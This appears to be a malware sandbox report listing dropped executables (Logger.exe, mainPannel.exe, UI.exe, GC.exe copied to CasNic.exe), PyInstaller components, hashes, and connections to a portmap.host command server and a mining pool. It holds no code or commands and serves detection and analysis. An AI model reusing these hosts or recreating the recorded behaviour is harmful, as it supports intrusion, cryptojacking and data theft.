C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 254.153.27.67.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 blank-dfroz.in udp
US 8.8.8.8:53 NareReti-40382.portmap.host udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
US 8.8.8.8:53 10.73.50.20.in-addr.arpa udp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp
DE 193.161.193.99:40382 NareReti-40382.portmap.host tcp

Files

memory/3696-0-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/3696-1-0x0000000000570000-0x000000000489C000-memory.dmp

memory/3696-2-0x000000001F5B0000-0x000000001F5C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

memory/368-13-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/368-15-0x000001C92DA70000-0x000001C92DA80000-memory.dmp

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

memory/368-16-0x000001C92DA70000-0x000001C92DA80000-memory.dmp

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Local\Temp\_MEI17642\python311.dll

MD5 5792adeab1e4414e0129ce7a228eb8b8
SHA1 e9f022e687b6d88d20ee96d9509f82e916b9ee8c
SHA256 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967
SHA512 c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

memory/368-41-0x000001C92DAF0000-0x000001C92DB12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\_MEI17642\python311.dll

MD5 5792adeab1e4414e0129ce7a228eb8b8
SHA1 e9f022e687b6d88d20ee96d9509f82e916b9ee8c
SHA256 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967
SHA512 c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

C:\Users\Admin\AppData\Local\Temp\_MEI17642\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wlvaovxm.fj0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1664-55-0x00007FFCE5400000-0x00007FFCE59E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\base_library.zip

MD5 e17ce7183e682de459eec1a5ac9cbbff
SHA1 722968ca6eb123730ebc30ff2d498f9a5dad4cc1
SHA256 ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d
SHA512 fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1

memory/368-57-0x000001C92DA70000-0x000001C92DA80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI17642\blank.aes

MD5 9baaf674093c1a16ec32e34132f51322
SHA1 afc51b60ec89af834297e01229566be5b27fab75
SHA256 55f06f3d9f2b0a02f4d4e663a4416c0268315b0b30120b6174a2db517f0de8c4
SHA512 aff6512ca8002573d1c7b95aeaefe7bc6d22d028ef9fc8b4c1ce7537911c8e5a36bdc842685d224761d643f743b0e8c3029945d10601a993889752cf41f82123

memory/1664-65-0x00007FFCF3D20000-0x00007FFCF3D2F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/1664-62-0x00007FFCE7E20000-0x00007FFCE7E43000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_ctypes.pyd

MD5 1adfe4d0f4d68c9c539489b89717984d
SHA1 8ae31b831b3160f5b88dda58ad3959c7423f8eb2
SHA256 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c
SHA512 b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_ctypes.pyd

MD5 1adfe4d0f4d68c9c539489b89717984d
SHA1 8ae31b831b3160f5b88dda58ad3959c7423f8eb2
SHA256 64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c
SHA512 b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

memory/3696-72-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/368-74-0x000001C92DA70000-0x000001C92DA80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_lzma.pyd

MD5 3798175fd77eded46a8af6b03c5e5f6d
SHA1 f637eaf42080dcc620642400571473a3fdf9174f
SHA256 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41
SHA512 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

memory/1664-91-0x00007FFCFA690000-0x00007FFCFA6BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\sqlite3.dll

MD5 395332e795cb6abaca7d0126d6c1f215
SHA1 b845bd8864cd35dcb61f6db3710acc2659ed9f18
SHA256 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c
SHA512 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

C:\Users\Admin\AppData\Local\Temp\_MEI17642\sqlite3.dll

MD5 395332e795cb6abaca7d0126d6c1f215
SHA1 b845bd8864cd35dcb61f6db3710acc2659ed9f18
SHA256 8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c
SHA512 8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

memory/3696-99-0x000000001F5B0000-0x000000001F5C0000-memory.dmp

memory/1664-104-0x00007FFCE2EF0000-0x00007FFCE3067000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_ssl.pyd

MD5 2089768e25606262921e4424a590ff05
SHA1 bc94a8ff462547ab48c2fbf705673a1552545b76
SHA256 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca
SHA512 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

memory/1664-115-0x00007FFCEBAA0000-0x00007FFCEBACE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libcrypto-1_1.dll

MD5 dffcab08f94e627de159e5b27326d2fc
SHA1 ab8954e9ae94ae76067e5a0b1df074bccc7c3b68
SHA256 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15
SHA512 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libcrypto-1_1.dll

MD5 dffcab08f94e627de159e5b27326d2fc
SHA1 ab8954e9ae94ae76067e5a0b1df074bccc7c3b68
SHA256 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15
SHA512 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

memory/1664-122-0x00007FFCE6090000-0x00007FFCE6408000-memory.dmp

memory/1664-124-0x00007FFCE7E20000-0x00007FFCE7E43000-memory.dmp

memory/1664-123-0x000001C73CC10000-0x000001C73CF88000-memory.dmp

memory/1664-120-0x00007FFCE8190000-0x00007FFCE8248000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_hashlib.pyd

MD5 f10d896ed25751ead72d8b03e404ea36
SHA1 eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb
SHA256 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3
SHA512 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

memory/1664-118-0x00007FFCFA610000-0x00007FFCFA61D000-memory.dmp

memory/1664-117-0x00007FFCE5400000-0x00007FFCE59E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libssl-1_1.dll

MD5 8e8a145e122a593af7d6cde06d2bb89f
SHA1 b0e7d78bb78108d407239e9f1b376e0c8c295175
SHA256 a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1
SHA512 d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libssl-1_1.dll

MD5 8e8a145e122a593af7d6cde06d2bb89f
SHA1 b0e7d78bb78108d407239e9f1b376e0c8c295175
SHA256 a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1
SHA512 d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

C:\Users\Admin\AppData\Local\Temp\_MEI17642\libcrypto-1_1.dll

MD5 dffcab08f94e627de159e5b27326d2fc
SHA1 ab8954e9ae94ae76067e5a0b1df074bccc7c3b68
SHA256 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15
SHA512 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_ssl.pyd

MD5 2089768e25606262921e4424a590ff05
SHA1 bc94a8ff462547ab48c2fbf705673a1552545b76
SHA256 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca
SHA512 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

C:\Users\Admin\AppData\Local\Temp\_MEI17642\select.pyd

MD5 90fea71c9828751e36c00168b9ba4b2b
SHA1 15b506df7d02612e3ba49f816757ad0c141e9dc1
SHA256 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d
SHA512 e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

memory/1664-109-0x00007FFCFA620000-0x00007FFCFA639000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\select.pyd

MD5 90fea71c9828751e36c00168b9ba4b2b
SHA1 15b506df7d02612e3ba49f816757ad0c141e9dc1
SHA256 5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d
SHA512 e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_socket.pyd

MD5 bcc3e26a18d59d76fd6cf7cd64e9e14d
SHA1 b85e4e7d300dbeec942cb44e4a38f2c6314d3166
SHA256 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98
SHA512 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_socket.pyd

MD5 bcc3e26a18d59d76fd6cf7cd64e9e14d
SHA1 b85e4e7d300dbeec942cb44e4a38f2c6314d3166
SHA256 4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98
SHA512 65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_hashlib.pyd

MD5 f10d896ed25751ead72d8b03e404ea36
SHA1 eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb
SHA256 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3
SHA512 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

memory/1664-127-0x00007FFCFA460000-0x00007FFCFA474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GC.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

memory/3696-147-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/4328-149-0x0000000005970000-0x0000000005F14000-memory.dmp

memory/1568-151-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/1568-152-0x0000000001BF0000-0x0000000001C00000-memory.dmp

memory/4328-150-0x0000000005290000-0x0000000005322000-memory.dmp

memory/4328-148-0x0000000075310000-0x0000000075AC0000-memory.dmp

memory/4328-153-0x0000000005390000-0x00000000053A0000-memory.dmp

memory/4328-154-0x0000000005270000-0x000000000527A000-memory.dmp

memory/1568-146-0x0000000000F80000-0x00000000012A4000-memory.dmp

memory/1664-145-0x00007FFCE7EF0000-0x00007FFCE800C000-memory.dmp

memory/4328-144-0x0000000000950000-0x00000000009C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GC.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

C:\Users\Admin\AppData\Local\Temp\_MEI17642\unicodedata.pyd

MD5 c2556dc74aea61b0bd9bd15e9cd7b0d6
SHA1 05eff76e393bfb77958614ff08229b6b770a1750
SHA256 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d
SHA512 f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

C:\Users\Admin\AppData\Local\Temp\GC.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

C:\Users\Admin\AppData\Local\Temp\_MEI17642\unicodedata.pyd

MD5 c2556dc74aea61b0bd9bd15e9cd7b0d6
SHA1 05eff76e393bfb77958614ff08229b6b770a1750
SHA256 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d
SHA512 f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

memory/1664-132-0x00007FFCFA600000-0x00007FFCFA60D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_queue.pyd

MD5 decdabaca104520549b0f66c136a9dc1
SHA1 423e6f3100013e5a2c97e65e94834b1b18770a87
SHA256 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84
SHA512 d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_queue.pyd

MD5 decdabaca104520549b0f66c136a9dc1
SHA1 423e6f3100013e5a2c97e65e94834b1b18770a87
SHA256 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84
SHA512 d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

memory/368-103-0x00007FFCE9F70000-0x00007FFCEAA31000-memory.dmp

memory/1664-102-0x00007FFCFA640000-0x00007FFCFA663000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_sqlite3.pyd

MD5 eb6313b94292c827a5758eea82d018d9
SHA1 7070f715d088c669eda130d0f15e4e4e9c4b7961
SHA256 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da
SHA512 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

memory/1664-96-0x00007FFCFA670000-0x00007FFCFA689000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_sqlite3.pyd

MD5 eb6313b94292c827a5758eea82d018d9
SHA1 7070f715d088c669eda130d0f15e4e4e9c4b7961
SHA256 6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da
SHA512 23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_bz2.pyd

MD5 2d461b41f6e9a305dde68e9c59e4110a
SHA1 97c2266f47a651e37a72c153116d81d93c7556e8
SHA256 abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4
SHA512 eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_bz2.pyd

MD5 2d461b41f6e9a305dde68e9c59e4110a
SHA1 97c2266f47a651e37a72c153116d81d93c7556e8
SHA256 abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4
SHA512 eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

C:\Users\Admin\AppData\Local\Temp\_MEI17642\_lzma.pyd

MD5 3798175fd77eded46a8af6b03c5e5f6d
SHA1 f637eaf42080dcc620642400571473a3fdf9174f
SHA256 3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41
SHA512 1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

memory/1664-156-0x00007FFCE5400000-0x00007FFCE59E9000-memory.dmp

memory/1664-157-0x00007FFCE7E20000-0x00007FFCE7E43000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1664-162-0x00007FFCFA640000-0x00007FFCFA663000-memory.dmp

memory/1664-164-0x00007FFCFA620000-0x00007FFCFA639000-memory.dmp

memory/1664-166-0x00007FFCEBAA0000-0x00007FFCEBACE000-memory.dmp

memory/1664-167-0x00007FFCE8190000-0x00007FFCE8248000-memory.dmp

memory/1664-168-0x00007FFCE6090000-0x00007FFCE6408000-memory.dmp

memory/1664-171-0x00007FFCE7EF0000-0x00007FFCE800C000-memory.dmp

C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
SHA1 d69a9b01e46a84347317f93898c270b0df1fd4ca
SHA256 4a9200dc3e6249ae7444fab0b4254069aad441d50699f9af4e5cecc780a265ec
SHA512 e22cb8b48cbfe5499c99c4f76211b8f55432e48b5727d53bfc094f5295f09e2a3c5feb770ff1df195a9da85f3584d5bf8bb60dbadb02b2616f70b4829b637bfe

C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe

MD5 b2bcd053c6452f8a04ba108d850f9781
